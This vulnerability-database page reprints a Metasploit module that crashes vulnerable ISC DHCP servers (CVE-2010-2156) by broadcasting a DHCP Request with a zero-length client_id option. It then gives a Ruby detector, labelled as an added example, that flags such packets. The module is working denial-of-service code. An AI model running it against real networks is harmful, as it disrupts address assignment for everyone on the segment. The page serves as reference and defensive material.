
ISC DHCP Zero Length ClientID Denial of Service Module

Date: 11 Apr 2011 15:56:39
Reported by: sid, theLightCosine <[email protected]>
Type: metasploit
Source: www.rapid7.com

The ISC DHCP Zero Length ClientID Denial of Service Module performs a DoS attack against ISC DHCP servers: it sends a DHCP Request with a 0-length client_id option, which causes the server to exit abnormally.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'          => 'ISC DHCP Zero Length ClientID Denial of Service Module',
      'Description'   => %q{
          This module performs a Denial of Service Attack against the ISC DHCP server,
        versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
        message with a 0-length client_id option for an IP address on the appropriate range
        for the dhcp server. When ISC DHCP Server tries to hash this value it exits
        abnormally.
      },
      'Author'        =>
          [
            'sid', # Original POC
            'theLightCosine' # msf module
          ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2010-2156' ],
          [ 'OSVDB', '65246'],
          [ 'EDB', '14185']
        ]
    )
    register_options(
      [
        OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
      ]
    )
    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
  end

  def run
    open_pcap
    print_status("Creating DHCP Request with 0-length ClientID")
    p = PacketFu::UDPPacket.new
    p.ip_daddr = "255.255.255.255"
    p.udp_sport = 68
    p.udp_dport = 67

    # TODO: Get a DHCP parser into PacketFu
    chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
    dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
    p.payload = dhcp_req(chaddr,dhcp_payload)
    p.recalc
    print_status("Sending malformed DHCP request...")
    capture_sendto(p, '255.255.255.255')
    close_pcap
  end

  def dhcp_req(chaddr,payload)
    req = "\x00" * 236
    req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
    req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])
    req[28,6] = chaddr
    req + payload
  end
end
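
A defensive counterpart to the request built above, as an added example that is not part of the Metasploit module or the original page: a Ruby check that a sensor or test harness could run over a captured BOOTP/DHCP UDP payload to flag a zero-length client identifier (option 61). The function name, the finding symbols and the well-formed sample are constructed for illustration; the malformed option bytes are the ones shown in the module.

```ruby
# Added example: walk the DHCP options of a UDP payload and report anomalies.
BOOTP_FIXED_LEN = 236                     # fixed BOOTP header before the options
DHCP_MAGIC      = "\x63\x82\x53\x63".b    # magic cookie that starts the options
OPT_PAD         = 0
OPT_CLIENT_ID   = 61
OPT_END         = 255

# Returns an array of finding symbols; an empty array means nothing was flagged.
def dhcp_option_findings(udp_payload)
  data = udp_payload.b
  return [:too_short] if data.bytesize < BOOTP_FIXED_LEN + DHCP_MAGIC.bytesize
  return [:bad_magic] unless data.byteslice(BOOTP_FIXED_LEN, 4) == DHCP_MAGIC

  findings = []
  pos = BOOTP_FIXED_LEN + DHCP_MAGIC.bytesize
  while pos < data.bytesize
    code = data.getbyte(pos)
    pos += 1
    next if code == OPT_PAD               # pad option has no length byte
    return findings if code == OPT_END    # end option closes the list
    len = data.getbyte(pos)
    # Length byte missing, or value runs past the end of the packet.
    return findings << :truncated_option if len.nil? || pos + 1 + len > data.bytesize
    # The condition this page is about: option 61 present with length 0.
    findings << :zero_length_client_id if code == OPT_CLIENT_ID && len.zero?
    pos += 1 + len
  end
  findings << :missing_end_option
end

# Constructed sample: BOOTP header (boot request, Ethernet, hw len 6) + options.
def sample_packet(options)
  fixed = "\x00".b * BOOTP_FIXED_LEN
  fixed[0, 3] = "\x01\x01\x06".b
  fixed + DHCP_MAGIC + options.b
end

# Constructed well-formed options: message type 3, client id of 7 bytes, end.
WELL_FORMED_OPTS = "\x35\x01\x03\x3d\x07\x01\xaa\xaa\xaa\xaa\xaa\xaa\xff"
# Option bytes as they appear in the module above (after the magic cookie).
MALFORMED_OPTS   = "\x35\x01\x03\x3d\x00\xff"

if __FILE__ == $PROGRAM_NAME
  puts dhcp_option_findings(sample_packet(WELL_FORMED_OPTS)).inspect
  puts dhcp_option_findings(sample_packet(MALFORMED_OPTS)).inspect
end
```
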

Last updated: 05 Mar 2019 19:04 (current)
Vulners AI Score: 7 (High risk)
CVSS 2: 5
EPSS: 0.76412